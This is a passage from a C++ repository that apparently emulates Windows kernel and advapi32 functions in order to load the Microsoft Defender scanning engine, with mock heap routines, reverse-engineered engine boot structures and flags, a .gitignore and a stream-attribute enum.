MockNTKrnl::m_heap_handle[heap_handle]; 101 | size_t init_sz = std::get(handle_info); 102 | size_t max_sz = std::get(handle_info); 103 | size_t cur_sz = std::get(handle_info); 104 | 105 | uint64_t mem_ptr; 106 | if (zeroize) { 107 | mem_ptr = (uint64_t)calloc(mem_size, 1); 108 | } 109 | else { 110 | mem_ptr = (uint64_t)malloc(mem_size); 111 | } 112 | 113 | if (max_sz != 0) { 114 | // fixed heap 115 | size_t after_heap_sz = cur_sz + mem_size; 116 | if (after_heap_sz > max_sz) { 117 | return NULL; 118 | } 119 | } 120 | else { 121 | // flexible heap 122 | std::get(MockNTKrnl::m_heap_handle[heap_handle]) += mem_size; 123 | std::get(MockNTKrnl::m_heap_handle[heap_handle])[mem_ptr] = mem_size; 124 | } 125 | 126 | return (void*)mem_ptr; 127 | } 128 | 129 | void* MockNTKrnl::ResizeHeap(uint64_t heap_handle, bool zeroize, void* heap_base, size_t mem_size) { 130 | uint64_t mem_ptr = (uint64_t)heap_base; 131 | size_t mem_sz = 0; 132 | 133 | if (std::get(MockNTKrnl::m_heap_handle[heap_handle]).find(mem_ptr) 134 | == std::get(MockNTKrnl::m_heap_handle[heap_handle]).end()) { 135 | return NULL; // undefined... 136 | } 137 | 138 | mem_sz = std::get(MockNTKrnl::m_heap_handle[heap_handle])[mem_ptr]; 139 | std::get(MockNTKrnl::m_heap_handle[heap_handle]).erase(mem_ptr); 140 | 141 | mem_ptr = (uint64_t)realloc(heap_base, mem_size); 142 | 143 | if (zeroize) 144 | memset((void*)mem_ptr, 0, mem_size); 145 | 146 | size_t delta = mem_size - mem_sz; 147 | std::get(MockNTKrnl::m_heap_handle[heap_handle]) += delta; 148 | std::get(MockNTKrnl::m_heap_handle[heap_handle])[mem_ptr] = mem_size; 149 | 150 | return (void*)mem_ptr; 151 | } 152 | 153 | bool MockNTKrnl::FreeHeap(uint64_t heap_handle, void* heap_base) { 154 | tuple> handle_info; 155 | handle_info = MockNTKrnl::m_heap_handle[heap_handle]; 156 | 157 | uint64_t mem_ptr = (uint64_t)heap_base; 158 | size_t mem_sz = 0; 159 | if (std::get(MockNTKrnl::m_heap_handle[heap_handle]).find(mem_ptr) 160 | == std::get(MockNTKrnl::m_heap_handle[heap_handle]).end()) { 161 | return false; 162 | } 163 | mem_sz = std::get(MockNTKrnl::m_heap_handle[heap_handle])[mem_ptr]; 164 | std::get(MockNTKrnl::m_heap_handle[heap_handle]) -= mem_sz; 165 | std::get(MockNTKrnl::m_heap_handle[heap_handle]).erase(mem_ptr); 166 | free(heap_base); 167 | 168 | return true; 169 | } 170 | 171 | bool MockNTKrnl::DestroyHeap(uint64_t heap_handle) { 172 | void* heap_base = nullptr; 173 | for (const auto &m : std::get(MockNTKrnl::m_heap_handle[heap_handle])) { 174 | heap_base = (void*)m.first; 175 | free(heap_base); 176 | } 177 | 178 | MockNTKrnl::m_heap_handle.erase(heap_handle); 179 | 180 | return true; 181 | } 182 | -------------------------------------------------------------------------------- /mpcore/engineboot.h: -------------------------------------------------------------------------------- 1 | #ifndef __ENGINEBOOT_H 2 | #define __ENGINEBOOT_H 3 | #if defined(__WINDOWS__) 4 | #pragma once 5 | #endif 6 | #include 7 | #ifdef _X86 8 | #define BOOTENGINE_PARAMS_VERSION 0x8E00 9 | #elif _X64 10 | #define BOOTENGINE_PARAMS_VERSION 0x8B00 11 | #endif // _X86 12 | #pragma pack(push) 13 | 14 | enum { 15 | BOOT_CACHEENABLED = 1 << 0, 16 | BOOT_NOFILECHANGES = 1 << 3, 17 | BOOT_ENABLECALLISTO = 1 << 6, 18 | BOOT_REALTIMESIGS = 1 << 8, 19 | BOOT_DISABLENOTIFICATION = 1 << 9, 20 | BOOT_CLOUDBHEAVIORBLOCK = 1 << 10, 21 | BOOT_ENABLELOGGING = 1 << 12, 22 | BOOT_ENABLEBETA = 1 << 16, 23 | BOOT_ENABLEIEV = 1 << 17, 24 | BOOT_ENABLEMANAGED = 1 << 19, 25 | }; 26 | 27 | enum { 28 | BOOT_ATTR_NORMAL = 1 << 0, 29 | BOOT_ATTR_ISXBAC = 1 << 2, 30 | }; 31 | 32 | enum { 33 | ENGINE_UNPACK = 1 << 1, // 2 34 | ENGINE_HEURISTICS = 1 << 3, // 8 35 | ENGINE_DISABLETHROTTLING = 1 << 11, // 0x800 36 | ENGINE_PARANOID = 1 << 12, // 0x1000 37 | ENGINE_DISABLEANTISPYWARE = 1 << 15, // if this flag set, mpengine will not load mpasbase.vdm 38 | ENGINE_DISABLEANTIVIRUS = 1 << 16, // if this flag set, mpengine will not load mpavbase.vdm 39 | ENGINE_DISABLENETWORKDRIVES = 1 << 20, 40 | }; 41 | 42 | typedef struct _ENGINE_INFO { 43 | unsigned int field_0; 44 | unsigned int field_4; // Possibly Signature UNIX time? 45 | unsigned int field_8; 46 | unsigned int field_C; 47 | } ENGINE_INFO, *PENGINE_INFO; 48 | 49 | typedef struct _ENGINE_CONFIG { 50 | unsigned int EngineFlags; 51 | char16_t* Inclusions; // Example, "*.zip" 52 | void* Exceptions; 53 | char16_t* UnknownString2; 54 | char16_t* QuarantineLocation; 55 | unsigned int field_14; 56 | unsigned int field_18; 57 | unsigned int TempPath; 58 | unsigned int OfflinePath; 59 | unsigned int field_24; 60 | unsigned int field_28; 61 | unsigned int field_2C; // Setting this seems to cause packer to be reported. 62 | unsigned int field_30; 63 | unsigned int field_34; 64 | char* UnknownAnsiString1; 65 | char* UnknownAnsiString2; 66 | } ENGINE_CONFIG, *PENGINE_CONFIG; 67 | 68 | typedef struct _ENGINE_CONTEXT { 69 | unsigned int field_0; 70 | } ENGINE_CONTEXT, *PENGINE_CONTEXT; 71 | 72 | #ifdef _X86 73 | typedef struct _BOOTENGINE_PARAMS { 74 | /*0x0*/ uint32_t ClientVersion; 75 | /*0x4*/ char16_t* SignatureLocation; 76 | /*0x8*/ void* SpynetSource; // maybe 16byte structure & not important 77 | /*0xC*/ PENGINE_CONFIG EngineConfig; 78 | /*0x10*/ PENGINE_INFO EngineInfo; 79 | /*0x14*/ char16_t* ScanReportLocation; 80 | /*0x18*/ uint32_t BootFlags; 81 | /*0x1C*/ char16_t* LocalCopyDirectory; 82 | /*0x20*/ char16_t* OfflineTargetOS; 83 | /*0x24*/ char ProductString[16]; // not important 84 | /*0x34*/ uint32_t field_34; 85 | /*0x38*/ void* GlobalCallback; 86 | /*0x3C*/ PENGINE_CONTEXT EngineContext; 87 | /*0x40*/ uint32_t AvgCpuLoadFactor; 88 | /*0x44*/ char field_44[16]; // maybe product string 2 89 | /*0x54*/ char16_t* SpynetReportingGUID; 90 | /*0x58*/ char16_t* SpynetVersion; 91 | /*0x5C*/ char16_t* NISEngineVersion; 92 | /*0x60*/ char16_t* NISSignatureVersion; 93 | /*0x64*/ uint32_t FlightingEnabled; 94 | /*0x68*/ uint32_t FlightingLevel; 95 | /*0x6C*/ void* DynamicConfig; // 20byte structure 96 | /*0x70*/ uint32_t AutoSampleSubmission; 97 | /*0x74*/ uint32_t EnableThreatLogging; 98 | /*0x78*/ char16_t* ProductName; 99 | /*0x7C*/ uint32_t PassiveMode; 100 | /*0x80*/ uint32_t SenseEnabled; 101 | /*0x84*/ char16_t* SenseOrgId; 102 | /*0x88*/ uint32_t Attributes; 103 | /*0x8C*/ uint32_t BlockAtFirstSeen; 104 | /*0x90*/ uint32_t PUAProtection; 105 | /*0x94*/ uint32_t SideBySidePassiveMode; 106 | } BOOTENGINE_PARAMS, *PBOOTENGINE_PARAMS; 107 | 108 | #elif _X64 109 | typedef struct _BOOTENGINE_PARAMS { 110 | /*0x0*/ uint64_t ClientVersion; 111 | /*0x4*/ char16_t* SignatureLocation; 112 | /*0xC*/ void* SpynetSource; // maybe 16byte structure & not important 113 | /*0x14*/ PENGINE_CONFIG EngineConfig; 114 | /*0x1C*/ PENGINE_INFO EngineInfo; 115 | /*0x24*/ char16_t* ScanReportLocation; 116 | /*0x2C*/ unsigned int BootFlags; 117 | /*0x30*/ char16_t* LocalCopyDirectory; 118 | /*0x38*/ char16_t* OfflineTargetOS; 119 | /*0x40*/ char ProductString[16]; // not important 120 | /*0x50*/ unsigned int field_34; 121 | /*0x64*/ void* GlobalCallback; 122 | /*0x6C*/ PENGINE_CONTEXT EngineContext; 123 | /*0x74*/ unsigned int AvgCpuLoadFactor; 124 | /*0x78*/ char field_44[16]; // maybe product string 2 125 | /*0x88*/ char16_t* SpynetReportingGUID; 126 | /*0x90*/ char16_t* SpynetVersion; 127 | /*0x98*/ char16_t* NISEngineVersion; 128 | /*0x100*/ char16_t* NISSignatureVersion; 129 | /*0x108*/ unsigned int FlightingEnabled; 130 | /*0x10C*/ unsigned int FlightingLevel; 131 | /*0x110*/ void* DynamicConfig; // 20byte structure 132 | /*0x118*/ unsigned int AutoSampleSubmission; 133 | /*0x11C*/ unsigned int EnableThreatLogging; 134 | /*0x120*/ char16_t* ProductName; 135 | /*0x128*/ unsigned int PassiveMode; 136 | /*0x12C*/ unsigned int SenseEnabled; 137 | /*0x130*/ char16_t* SenseOrgId; 138 | /*0x138*/ unsigned int Attributes; 139 | /*0x13C*/ unsigned int BlockAtFirstSeen; 140 | /*0x140*/ unsigned int PUAProtection; 141 | /*0x14C*/ unsigned int SideBySidePassiveMode; 142 | } BOOTENGINE_PARAMS, *PBOOTENGINE_PARAMS; 143 | #endif 144 | #pragma pack(push) 145 | #endif // __ENGINEBOOT_H 146 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | ## Ignore Visual Studio temporary files, build results, and 2 | ## files generated by popular Visual Studio add-ons. 3 | ## 4 | ## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore 5 | 6 | # User-specific files 7 | *.rsuser 8 | *.suo 9 | *.user 10 | *.userosscache 11 | *.sln.docstates 12 | 13 | # User-specific files (MonoDevelop/Xamarin Studio) 14 | *.userprefs 15 | 16 | # Mono auto generated files 17 | mono_crash.* 18 | 19 | # Build results 20 | [Dd]ebug/ 21 | [Dd]ebugPublic/ 22 | [Rr]elease/ 23 | [Rr]eleases/ 24 | x64/ 25 | x86/ 26 | [Aa][Rr][Mm]/ 27 | [Aa][Rr][Mm]64/ 28 | bld/ 29 | [Bb]in/ 30 | [Oo]bj/ 31 | [Ll]og/ 32 | 33 | # Visual Studio 2015/2017 cache/options directory 34 | .vs/ 35 | # Uncomment if you have tasks that create the project's static files in wwwroot 36 | #wwwroot/ 37 | 38 | # Visual Studio 2017 auto generated files 39 | Generated\ Files/ 40 | 41 | # MSTest test Results 42 | [Tt]est[Rr]esult*/ 43 | [Bb]uild[Ll]og.* 44 | 45 | # NUnit 46 | *.VisualState.xml 47 | TestResult.xml 48 | nunit-*.xml 49 | 50 | # Build Results of an ATL Project 51 | [Dd]ebugPS/ 52 | [Rr]eleasePS/ 53 | dlldata.c 54 | 55 | # Benchmark Results 56 | BenchmarkDotNet.Artifacts/ 57 | 58 | # .NET Core 59 | project.lock.json 60 | project.fragment.lock.json 61 | artifacts/ 62 | 63 | # StyleCop 64 | StyleCopReport.xml 65 | 66 | # Files built by Visual Studio 67 | *_i.c 68 | *_p.c 69 | *_h.h 70 | *.ilk 71 | *.meta 72 | *.obj 73 | *.iobj 74 | *.pch 75 | *.pdb 76 | *.ipdb 77 | *.pgc 78 | *.pgd 79 | *.rsp 80 | *.sbr 81 | *.tlb 82 | *.tli 83 | *.tlh 84 | *.tmp 85 | *.tmp_proj 86 | *_wpftmp.csproj 87 | *.log 88 | *.vspscc 89 | *.vssscc 90 | .builds 91 | *.pidb 92 | *.svclog 93 | *.scc 94 | 95 | # Chutzpah Test files 96 | _Chutzpah* 97 | 98 | # Visual C++ cache files 99 | ipch/ 100 | *.aps 101 | *.ncb 102 | *.opendb 103 | *.opensdf 104 | *.sdf 105 | *.cachefile 106 | *.VC.db 107 | *.VC.VC.opendb 108 | 109 | # Visual Studio profiler 110 | *.psess 111 | *.vsp 112 | *.vspx 113 | *.sap 114 | 115 | # Visual Studio Trace Files 116 | *.e2e 117 | 118 | # TFS 2012 Local Workspace 119 | $tf/ 120 | 121 | # Guidance Automation Toolkit 122 | *.gpState 123 | 124 | # ReSharper is a .NET coding add-in 125 | _ReSharper*/ 126 | *.[Rr]e[Ss]harper 127 | *.DotSettings.user 128 | 129 | # JustCode is a .NET coding add-in 130 | .JustCode 131 | 132 | # TeamCity is a build add-in 133 | _TeamCity* 134 | 135 | # DotCover is a Code Coverage Tool 136 | *.dotCover 137 | 138 | # AxoCover is a Code Coverage Tool 139 | .axoCover/* 140 | !.axoCover/settings.json 141 | 142 | # Visual Studio code coverage results 143 | *.coverage 144 | *.coveragexml 145 | 146 | # NCrunch 147 | _NCrunch_* 148 | .*crunch*.local.xml 149 | nCrunchTemp_* 150 | 151 | # MightyMoose 152 | *.mm.* 153 | AutoTest.Net/ 154 | 155 | # Web workbench (sass) 156 | .sass-cache/ 157 | 158 | # Installshield output folder 159 | [Ee]xpress/ 160 | 161 | # DocProject is a documentation generator add-in 162 | DocProject/buildhelp/ 163 | DocProject/Help/*.HxT 164 | DocProject/Help/*.HxC 165 | DocProject/Help/*.hhc 166 | DocProject/Help/*.hhk 167 | DocProject/Help/*.hhp 168 | DocProject/Help/Html2 169 | DocProject/Help/html 170 | 171 | # Click-Once directory 172 | publish/ 173 | 174 | # Publish Web Output 175 | *.[Pp]ublish.xml 176 | *.azurePubxml 177 | # Note: Comment the next line if you want to checkin your web deploy settings, 178 | # but database connection strings (with potential passwords) will be unencrypted 179 | *.pubxml 180 | *.publishproj 181 | 182 | # Microsoft Azure Web App publish settings. Comment the next line if you want to 183 | # checkin your Azure Web App publish settings, but sensitive information contained 184 | # in these scripts will be unencrypted 185 | PublishScripts/ 186 | 187 | # NuGet Packages 188 | *.nupkg 189 | # NuGet Symbol Packages 190 | *.snupkg 191 | # The packages folder can be ignored because of Package Restore 192 | **/[Pp]ackages/* 193 | # except build/, which is used as an MSBuild target. 194 | !**/[Pp]ackages/build/ 195 | # Uncomment if necessary however generally it will be regenerated when needed 196 | #!**/[Pp]ackages/repositories.config 197 | # NuGet v3's project.json files produces more ignorable files 198 | *.nuget.props 199 | *.nuget.targets 200 | 201 | # Microsoft Azure Build Output 202 | csx/ 203 | *.build.csdef 204 | 205 | # Microsoft Azure Emulator 206 | ecf/ 207 | rcf/ 208 | 209 | # Windows Store app package directories and files 210 | AppPackages/ 211 | BundleArtifacts/ 212 | Package.StoreAssociation.xml 213 | _pkginfo.txt 214 | *.appx 215 | *.appxbundle 216 | *.appxupload 217 | 218 | # Visual Studio cache files 219 | # files ending in .cache can be ignored 220 | *.[Cc]ache 221 | # but keep track of directories ending in .cache 222 | !?*.[Cc]ache/ 223 | 224 | # Others 225 | ClientBin/ 226 | ~$* 227 | *~ 228 | *.dbmdl 229 | *.dbproj.schemaview 230 | *.jfm 231 | *.pfx 232 | *.publishsettings 233 | orleans.codegen.cs 234 | 235 | # Including strong name files can present a security risk 236 | # (https://github.com/github/gitignore/pull/2483#issue-259490424) 237 | #*.snk 238 | 239 | # Since there are multiple workflows, uncomment next line to ignore bower_components 240 | # (https://github.com/github/gitignore/pull/1529#issuecomment-104372622) 241 | #bower_components/ 242 | 243 | # RIA/Silverlight projects 244 | Generated_Code/ 245 | 246 | # Backup & report files from converting an old project file 247 | # to a newer Visual Studio version. Backup files are not needed, 248 | # because we have git ;-) 249 | _UpgradeReport_Files/ 250 | Backup*/ 251 | UpgradeLog*.XML 252 | UpgradeLog*.htm 253 | ServiceFabricBackup/ 254 | *.rptproj.bak 255 | 256 | # SQL Server files 257 | *.mdf 258 | *.ldf 259 | *.ndf 260 | 261 | # Business Intelligence projects 262 | *.rdl.data 263 | *.bim.layout 264 | *.bim_*.settings 265 | *.rptproj.rsuser 266 | *- [Bb]ackup.rdl 267 | *- [Bb]ackup ([0-9]).rdl 268 | *- [Bb]ackup ([0-9][0-9]).rdl 269 | 270 | # Microsoft Fakes 271 | FakesAssemblies/ 272 | 273 | # GhostDoc plugin setting file 274 | *.GhostDoc.xml 275 | 276 | # Node.js Tools for Visual Studio 277 | .ntvs_analysis.dat 278 | node_modules/ 279 | 280 | # Visual Studio 6 build log 281 | *.plg 282 | 283 | # Visual Studio 6 workspace options file 284 | *.opt 285 | 286 | # Visual Studio 6 auto-generated workspace file (contains which files were open etc.) 287 | *.vbw 288 | 289 | # Visual Studio LightSwitch build output 290 | **/*.HTMLClient/GeneratedArtifacts 291 | **/*.DesktopClient/GeneratedArtifacts 292 | **/*.DesktopClient/ModelManifest.xml 293 | **/*.Server/GeneratedArtifacts 294 | **/*.Server/ModelManifest.xml 295 | _Pvt_Extensions 296 | 297 | # Paket dependency manager 298 | .paket/paket.exe 299 | paket-files/ 300 | 301 | # FAKE - F# Make 302 | .fake/ 303 | 304 | # CodeRush personal settings 305 | .cr/personal 306 | 307 | # Python Tools for Visual Studio (PTVS) 308 | __pycache__/ 309 | *.pyc 310 | 311 | # Cake - Uncomment if you are using it 312 | # tools/** 313 | # !tools/packages.config 314 | 315 | # Tabs Studio 316 | *.tss 317 | 318 | # Telerik's JustMock configuration file 319 | *.jmconfig 320 | 321 | # BizTalk build output 322 | *.btp.cs 323 | *.btm.cs 324 | *.odx.cs 325 | *.xsd.cs 326 | 327 | # OpenCover UI analysis results 328 | OpenCover/ 329 | 330 | # Azure Stream Analytics local run output 331 | ASALocalRun/ 332 | 333 | # MSBuild Binary and Structured Log 334 | *.binlog 335 | 336 | # NVidia Nsight GPU debugger configuration file 337 | *.nvuser 338 | 339 | # MFractors (Xamarin productivity tool) working folder 340 | .mfractor/ 341 | 342 | # Local History for Visual Studio 343 | .localhistory/ 344 | 345 | # BeatPulse healthcheck temp database 346 | healthchecksdb 347 | 348 | # Backup folder for Package Reference Convert tool in Visual Studio 2017 349 | MigrationBackup/ 350 | -------------------------------------------------------------------------------- /winapi/dlls/advapi32.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | 5 | #ifndef _ADVAPI_H_ 6 | #define _ADVAPI_H_ 7 | 8 | #if defined(__WINDOWS__) 9 | #include 10 | #include 11 | #include 12 | #else 13 | 14 | #endif 15 | #include 16 | #include "../exports.h" 17 | #include "../ntoskrnl.h" 18 | 19 | class MockAdvapi { 20 | public: 21 | function set_advapi_hookaddr = [](void) { 22 | 23 | APIExports::add_hook_info("advapi32.DLL", "RegisterTraceGuidsW", (void*)RegisterTraceGuidsW); 24 | APIExports::add_hook_info("advapi32.DLL", "EventSetInformation", (void*)EventSetInformation); 25 | APIExports::add_hook_info("advapi32.DLL", "LookupPrivilegeValueA", (void*)LookupPrivilegeValueA); 26 | APIExports::add_hook_info("advapi32.DLL", "LookupPrivilegeValueW", (void*)LookupPrivilegeValueW); 27 | APIExports::add_hook_info("advapi32.DLL", "AdjustTokenPrivileges", (void*)AdjustTokenPrivileges); 28 | 29 | APIExports::add_hook_info("advapi32.DLL", "RegCreateKeyExW", (void*)RegCreateKeyExW); 30 | APIExports::add_hook_info("advapi32.DLL", "RegOpenKeyExW", (void*)RegOpenKeyExW); 31 | APIExports::add_hook_info("advapi32.DLL", "RegQueryInfoKeyW", (void*)RegQueryInfoKeyW); 32 | APIExports::add_hook_info("advapi32.DLL", "RegEnumKeyExW", (void*)RegEnumKeyExW); 33 | APIExports::add_hook_info("advapi32.DLL", "RegCloseKey", (void*)RegCloseKey); 34 | APIExports::add_hook_info("advapi32.DLL", "RegQueryValueExW", (void*)RegQueryValueExW); 35 | APIExports::add_hook_info("advapi32.DLL", "RegNotifyChangeKeyValue", (void*)RegNotifyChangeKeyValue); 36 | APIExports::add_hook_info("advapi32.DLL", "LsaNtStatusToWinError", (void*)LsaNtStatusToWinError); 37 | 38 | APIExports::add_hook_info("advapi32.DLL", "EventWriteEx", (void*)EventWriteEx); 39 | APIExports::add_hook_info("advapi32.DLL", "EventWriteTransfer", (void*)EventWriteTransfer); 40 | APIExports::add_hook_info("advapi32.DLL", "EventActivityIdControl", (void*)MyEventActivityIdControl); 41 | }; 42 | 43 | #if defined(__WINDOWS__) 44 | static uint32_t __stdcall MockAdvapi::RegisterTraceGuidsW(void* RequestAddress, void* RequestContext, void* ControlGuid, uint32_t GuidCOunt, void* TraceGuidReg, char16_t* MofImagePath, char16_t* MofResourceName, void* RegistrationHandle); 45 | static uint32_t __stdcall MockAdvapi::EventSetInformation(void* RegHandle, uint32_t InformationClass, void* EventInformation, uint32_t InformationLength); 46 | static bool __stdcall MockAdvapi::LookupPrivilegeValueA(char* lpSystemName, char* lpName, void* lpLuid); 47 | static bool __stdcall MockAdvapi::LookupPrivilegeValueW(char16_t* lpSystemName, char16_t* lpName, void* lpLuid); 48 | static bool __stdcall MockAdvapi::AdjustTokenPrivileges(void* TokenHandle, bool DisableAllPrivileges, void* NewState, uint32_t BufferLength, void* PreviousState, uint32_t* ReturnLength); 49 | 50 | static long __stdcall MockAdvapi::RegCreateKeyExW( 51 | void* hKey, 52 | char16_t* lpSubKey, 53 | uint32_t Reserved, 54 | void* lpClass, 55 | uint32_t dwOptions, 56 | void* samDesired, 57 | void* lpSecurityAttributes, 58 | void* phkResult, 59 | uint32_t* lpdwDisposition); 60 | static long __stdcall MockAdvapi::RegOpenKeyExW(void* hKey, char16_t* lpSubKey, uint32_t ulOptions, uint32_t samDesired, void** phkResult); 61 | static long __stdcall MockAdvapi::RegCloseKey(void* hKey); 62 | static long __stdcall MockAdvapi::RegQueryInfoKeyW( 63 | void* hKey, 64 | char16_t* lpClass, 65 | uint32_t* lpcClass, 66 | uint32_t* lpReserved, 67 | uint32_t* lpcSubKeys, 68 | uint32_t* lpcMaxSubKeyLen, 69 | uint32_t* lpcMaxClassLen, 70 | uint32_t* lpcValues, 71 | uint32_t* lpcMaxValueNameLen, 72 | uint32_t* lpcMaxValueLen, 73 | uint32_t* lpcbSecurityDescriptor, 74 | void* lpftLastWriteTime 75 | ); 76 | static long __stdcall MockAdvapi::RegQueryValueExW(void* hKey, char16_t* lpValueName, uint32_t* lpReserved, uint32_t* lpType, uint8_t* lpData, uint32_t* lpcbData); 77 | static long __stdcall MockAdvapi::RegEnumKeyExW(void* hkey, uint32_t dwIndex, char16_t* lpName, uint32_t* lpcchName, void* lpReserved, char16_t* lpClass, uint32_t* lpcchClass, void* lpftLastWriteTime); 78 | static long __stdcall MockAdvapi::RegNotifyChangeKeyValue(void* hKey, bool bWatchSubtree, uint32_t dwNotifyFilter, void* hEvent, bool fAsynchronous); 79 | 80 | static uint32_t __stdcall MockAdvapi::LsaNtStatusToWinError(uint32_t Status); 81 | static uint32_t __stdcall MockAdvapi::EventWriteEx( 82 | void* EventDescriptor, 83 | uint64_t Filter, 84 | uint32_t Flags, 85 | void* ActivityId, 86 | void* RelatedActivityId, 87 | uint32_t UserDataCount, 88 | void* UserData); 89 | static uint32_t __stdcall MockAdvapi::EventWriteTransfer( 90 | void* RegHandle, 91 | void* EventDescriptor, 92 | void* ActivityId, 93 | void* RelatedActivityId, 94 | uint32_t UserDataCount, 95 | void* UserData 96 | ); 97 | static uint32_t __stdcall MockAdvapi::MyEventActivityIdControl( 98 | uint32_t ControlCode, 99 | void* ActivityId 100 | ); 101 | #else 102 | static uint32_t __stdcall RegisterTraceGuidsW(void* RequestAddress, void* RequestContext, void* ControlGuid, uint32_t GuidCOunt, void* TraceGuidReg, char16_t* MofImagePath, char16_t* MofResourceName, void* RegistrationHandle); 103 | static uint32_t __stdcall EventSetInformation(void* RegHandle, uint32_t InformationClass, void* EventInformation, uint32_t InformationLength); 104 | static bool __stdcall LookupPrivilegeValueA(char* lpSystemName, char* lpName, void* lpLuid); 105 | static bool __stdcall LookupPrivilegeValueW(char16_t* lpSystemName, char16_t* lpName, void* lpLuid); 106 | static bool __stdcall AdjustTokenPrivileges(void* TokenHandle, bool DisableAllPrivileges, void* NewState, uint32_t BufferLength, void* PreviousState, uint32_t* ReturnLength); 107 | 108 | static long __stdcall RegCreateKeyExW( 109 | void* hKey, 110 | char16_t* lpSubKey, 111 | uint32_t Reserved, 112 | void* lpClass, 113 | uint32_t dwOptions, 114 | void* samDesired, 115 | void* lpSecurityAttributes, 116 | void* phkResult, 117 | uint32_t* lpdwDisposition); 118 | static long __stdcall RegOpenKeyExW(void* hKey, char16_t* lpSubKey, uint32_t ulOptions, uint32_t samDesired, void** phkResult); 119 | static long __stdcall RegCloseKey(void* hKey); 120 | static long __stdcall RegQueryInfoKeyW( 121 | void* hKey, 122 | char16_t* lpClass, 123 | uint32_t* lpcClass, 124 | uint32_t* lpReserved, 125 | uint32_t* lpcSubKeys, 126 | uint32_t* lpcMaxSubKeyLen, 127 | uint32_t* lpcMaxClassLen, 128 | uint32_t* lpcValues, 129 | uint32_t* lpcMaxValueNameLen, 130 | uint32_t* lpcMaxValueLen, 131 | uint32_t* lpcbSecurityDescriptor, 132 | void* lpftLastWriteTime 133 | ); 134 | static long __stdcall RegQueryValueExW(void* hKey, char16_t* lpValueName, uint32_t* lpReserved, uint32_t* lpType, uint8_t* lpData, uint32_t* lpcbData); 135 | static long __stdcall RegEnumKeyExW(void* hkey, uint32_t dwIndex, char16_t* lpName, uint32_t* lpcchName, void* lpReserved, char16_t* lpClass, uint32_t* lpcchClass, void* lpftLastWriteTime); 136 | static long __stdcall RegNotifyChangeKeyValue(void* hKey, bool bWatchSubtree, uint32_t dwNotifyFilter, void* hEvent, bool fAsynchronous); 137 | 138 | static uint32_t __stdcall LsaNtStatusToWinError(uint32_t Status); 139 | static uint32_t __stdcall EventWriteEx( 140 | void* EventDescriptor, 141 | uint64_t Filter, 142 | uint32_t Flags, 143 | void* ActivityId, 144 | void* RelatedActivityId, 145 | uint32_t UserDataCount, 146 | void* UserData); 147 | static uint32_t __stdcall EventWriteTransfer( 148 | void* RegHandle, 149 | void* EventDescriptor, 150 | void* ActivityId, 151 | void* RelatedActivityId, 152 | uint32_t UserDataCount, 153 | void* UserData 154 | ); 155 | static uint32_t __stdcall MyEventActivityIdControl( 156 | uint32_t ControlCode, 157 | void* ActivityId 158 | ); 159 | #endif 160 | 161 | }; 162 | #endif // !_ADVAPI_H_ 163 | 164 | -------------------------------------------------------------------------------- /mpcore/streambuffer.h: -------------------------------------------------------------------------------- 1 | #if defined(__WINDOWS__) 2 | #pragma once 3 | #endif 4 | #include "scanreply.h" 5 | 6 | #ifndef __STREAMBUFFER_H 7 | #define __STREAMBUFFER_H 8 | 9 | 10 | enum { 11 | STREAM_ATTRIBUTE_INVALID = 0, 12 | STREAM_ATTRIBUTE_SKIPBMNOTIFICATION = 1, 13 | STREAM_ATTRIBUTE_BMDATA = 2, 14 | STREAM_ATTRIBUTE_FILECOPYPERFHINT = 3, 15 | STREAM_ATTRIBUTE_FILECOPYSOURCEPATH = 4, 16 | STREAM_ATTRIBUTE_FILECHANGEPERFHINT = 5, 17 | STREAM_ATTRIBUTE_FILEOPPROCESSID = 6, 18 | STREAM_ATTRIBUTE_FILEBACKUPWRITEPERFHINT = 7, 19 | STREAM_ATTRIBUTE_DONOTCACHESCANRESULT = 8, 20 | STREAM_ATTRIBUTE_SCANREASON = 9, 21 | STREAM_ATTRIBUTE_FILEID = 10, 22 | STREAM_ATTRIBUTE_FILEVOLUMESERIALNUMBER = 11, 23 | STREAM_ATTRIBUTE_FILEUSN = 12, 24 | STREAM_ATTRIBUTE_SCRIPTTYPE = 13, 25 | STREAM_ATTRIBUTE_PRIVATE = 14, 26 | STREAM_ATTRIBUTE_URL = 15, 27 | STREAM_ATTRIBUTE_REFERRALURL = 16, 28 | STREAM_ATTRIBUTE_SCRIPTID = 17, 29 | STREAM_ATTRIBUTE_HOSTAPPVERSION = 18, 30 | STREAM_ATTRIBUTE_THREAT_ID = 19, 31 | STREAM_ATTRIBUTE_THREAT_STATUS = 21, 32 | STREAM_ATTRIBUTE_LOFI = 22, 33 | STREAM_ATTRIBUTE_THREAT_RESOURCES = 25, 34 | STREAM_ATTRIBUTE_LOFI_RESOURCES = 26, 35 | STREAM_ATTRIBUTE_VOLATILE = 29, 36 | STREAM_ATTRIBUTE_REFERRERURL = 30, 37 | STREAM_ATTRIBUTE_REQUESTORMODE = 31, 38 | STREAM_ATTRIBUTE_CI_EA = 33, 39 | STREAM_ATTRIBUTE_CURRENT_FILEUSN = 34, 40 | STREAM_ATTRIBUTE_AVAILABLE_DSS_THREADS = 35, 41 | STREAM_ATTRIBUTE_IO_STATUS_BLOCK_FOR_NEW_FILE = 36, 42 | STREAM_ATTRIBUTE_DESIRED_ACCESS = 37, 43 | STREAM_ATTRIBUTE_FILEOPPROCESSNAME = 38, 44 | STREAM_ATTRIBUTE_DETAILED_SCAN_NEEDED = 39, 45 | STREAM_ATTRIBUTE_URL_HAS_GOOD_REPUTATION = 40, 46 | STREAM_ATTRIBUTE_SITE_HAS_GOOD_REPUTATION = 41, 47 | STREAM_ATTRIBUTE_URL_ZONE = 42, 48 | STREAM_ATTRIBUTE_CONTROL_GUID = 43, 49 | STREAM_ATTRIBUTE_CONTROL_VERSION = 44, 50 | STREAM_ATTRIBUTE_CONTROL_PATH = 45, 51 | STREAM_ATTRIBUTE_CONTROL_HTML = 46, 52 | STREAM_ATTRIBUTE_PAGE_CONTEXT = 47, 53 | STREAM_ATTRIBUTE_FRAME_URL = 48, 54 | STREAM_ATTRIBUTE_FRAME_HTML = 49, 55 | STREAM_ATTRIBUTE_ACTION_IE_BLOCK_PAGE = 50, 56 | STREAM_ATTRIBUTE_ACTION_IE_BLOCK_CONTROL = 51, 57 | STREAM_ATTRIBUTE_SHARE_ACCESS = 52, 58 | STREAM_ATTRIBUTE_OPEN_OPTIONS = 53, 59 | STREAM_ATTRIBUTE_DEVICE_CHARACTERISTICS = 54, 60 | 